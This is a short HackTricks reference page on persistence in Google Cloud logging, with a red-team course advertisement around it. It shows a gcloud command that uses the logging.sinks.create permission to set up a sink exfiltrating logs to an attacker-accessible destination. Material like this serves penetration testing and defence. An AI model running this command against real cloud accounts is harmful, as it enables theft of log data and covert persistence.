GCP - Logging Persistence

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Logging

Find more information about Logging in:

pageGCP - Logging Enum

logging.sinks.create

Create a sink to exfiltrate the logs to an attackers accessible destination:

gcloud logging sinks create <sink-name> <destination> --log-filter="FILTER_CONDITION"
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Last updated